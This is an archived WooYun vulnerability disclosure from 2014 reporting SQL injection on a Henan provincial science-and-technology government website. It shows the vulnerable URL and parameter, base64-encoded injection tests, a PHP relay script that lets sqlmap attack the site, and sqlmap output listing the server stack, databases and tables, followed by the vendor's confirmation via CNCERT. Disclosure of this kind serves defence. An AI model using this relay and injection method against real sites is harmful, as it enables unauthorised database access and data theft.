当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070259

漏洞标题:河南科技网存在SQL注入

相关厂商:河南科技网

漏洞作者: 浮萍

提交时间:2014-07-30 11:08

修复时间:2014-09-13 11:10

公开时间:2014-09-13 11:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-30: 细节已通知厂商并且等待厂商处理中
2014-08-04: 厂商已经确认,细节仅向厂商公开
2014-08-14: 细节向核心白帽子及相关领域专家公开
2014-08-24: 细节向普通白帽子公开
2014-09-03: 细节向实习白帽子公开
2014-09-13: 细节向公众公开

简要描述:

详细说明:

河南科技网http://www.hnkjt.gov.cn/

Snap9.jpg


Snap10.jpg


dataId=MzQxNw== 经base64解密后为3417
3417'base64加密MzQxNyc=
页面不正常

Snap11.jpg


3417 and 1=1 加密 MzQxNyBhbmQgMT0x
页面正常

Snap12.jpg


爆字段

Snap13.jpg


爆数据库信息

Snap14.jpg


暴库

Snap15.jpg


这样爆表没爆出来
然后使用中转~~

漏洞证明:

<?php
header("Content-type: text/html; charset=gb2312"); 
set_time_limit(0);
$id=$_GET["id"];
$id = base64_encode($id);
$url = "http://www.hnkjt.gov.cn/new/allListDetail.eiip?cid=1&dataId=".$id;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
?>


访问http://host/xx.php?id=3417
丢入sqlmap
系统信息

web server operating system: Windows
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0.11


数据库

available databases [5]:
[*] cxqybak
[*] hnkjwdb_old
[*] hnsti_cn_db
[*] information_schema
[*] mysql


和爆出的数据库一样

Database: cxqybak
[188 tables]
+----------------+
| base_content   |
| epdbconinfo    |
| epdbfieldinfo  |
| epdbfieldtype  |
| epdbmoduleinfo |
| epdbphy1       |
| epdbphy10      |
| epdbphy100     |
| epdbphy101     |
| epdbphy102     |
| epdbphy103     |
| epdbphy106     |
| epdbphy107     |
| epdbphy108     |
| epdbphy109     |
| epdbphy11      |
| epdbphy110     |
| epdbphy111     |
| epdbphy112     |
| epdbphy113     |
| epdbphy120     |
| epdbphy121     |
| epdbphy122     |
| epdbphy123     |
| epdbphy124     |
| epdbphy125     |
| epdbphy126     |
| epdbphy127     |
| epdbphy13      |
| epdbphy137     |
| epdbphy138     |
| epdbphy14      |
| epdbphy140     |
| epdbphy141     |
| epdbphy142     |
| epdbphy143     |
| epdbphy144     |
| epdbphy145     |
| epdbphy146     |
| epdbphy147     |
| epdbphy148     |
| epdbphy149     |
| epdbphy15      |
| epdbphy150     |
| epdbphy151     |
| epdbphy152     |
| epdbphy153     |
| epdbphy154     |
| epdbphy155     |
| epdbphy156     |
| epdbphy157     |
| epdbphy158     |
| epdbphy159     |
| epdbphy16      |
| epdbphy160     |
| epdbphy161     |
| epdbphy162     |
| epdbphy163     |
| epdbphy164     |
| epdbphy165     |
| epdbphy166     |
| epdbphy167     |
| epdbphy168     |
| epdbphy169     |
| epdbphy17      |
| epdbphy170     |
| epdbphy171     |
| epdbphy172     |
| epdbphy173     |
| epdbphy174     |
| epdbphy175     |
| epdbphy176     |
| epdbphy18      |
| epdbphy186     |
| epdbphy187     |
| epdbphy188     |
| epdbphy189     |
| epdbphy19      |
| epdbphy191     |
| epdbphy192     |
| epdbphy193     |
| epdbphy194     |
| epdbphy196     |
| epdbphy197     |
| epdbphy198     |
| epdbphy199     |
| epdbphy2       |
| epdbphy20      |
| epdbphy200     |
| epdbphy201     |
| epdbphy202     |
| epdbphy205     |
| epdbphy206     |
| epdbphy207     |
| epdbphy208     |
| epdbphy209     |
| epdbphy21      |
| epdbphy213     |
| epdbphy216     |
| epdbphy217     |
| epdbphy218     |
| epdbphy219     |
| epdbphy22      |
| epdbphy220     |
| epdbphy221     |
| epdbphy222     |
| epdbphy223     |
| epdbphy224     |
| epdbphy225     |
| epdbphy226     |
| epdbphy227     |
| epdbphy228     |
| epdbphy23      |
| epdbphy24      |
| epdbphy25      |
| epdbphy26      |
| epdbphy27      |
| epdbphy28      |
| epdbphy29      |
| epdbphy3       |
| epdbphy30      |
| epdbphy35      |
| epdbphy36      |
| epdbphy37      |
| epdbphy38      |
| epdbphy39      |
| epdbphy4       |
| epdbphy40      |
| epdbphy41      |
| epdbphy42      |
| epdbphy43      |
| epdbphy44      |
| epdbphy45      |
| epdbphy46      |
| epdbphy47      |
| epdbphy48      |
| epdbphy5       |
| epdbphy50      |
| epdbphy51      |
| epdbphy52      |
| epdbphy53      |
| epdbphy54      |
| epdbphy55      |
| epdbphy56      |
| epdbphy58      |
| epdbphy59      |
| epdbphy60      |
| epdbphy61      |
| epdbphy64      |
| epdbphy66      |
| epdbphy67      |
| epdbphy68      |
| epdbphy69      |
| epdbphy70      |
| epdbphy71      |
| epdbphy72      |
| epdbphy73      |
| epdbphy74      |
| epdbphy75      |
| epdbphy76      |
| epdbphy77      |
| epdbphy78      |
| epdbphy79      |
| epdbphy80      |
| epdbphy81      |
| epdbphy82      |
| epdbphy84      |
| epdbphy85      |
| epdbphy86      |
| epdbphy87      |
| epdbphy88      |
| epdbphy89      |
| epdbphy9       |
| epdbphy90      |
| epdbphy91      |
| epdbphy92      |
| epdbphy93      |
| epdbphy94      |
| epdbphy96      |
| epdbphy97      |
| epdbphy98      |
| epdbphy99      |
| epdbstandright |
| epdbsysinfo    |
| ip_0_194       |
| ip_195_217     |
| ip_218_218     |
| ip_219_255     |
+----------------+


Database: hnsti_cn_db
[86 tables]


Database: hnkjwdb_old
[190 tables]


修复方案:

版权声明:转载请注明来源 浮萍@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-08-04 09:49

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心处置。

最新状态:

暂无

漏洞评价:

评论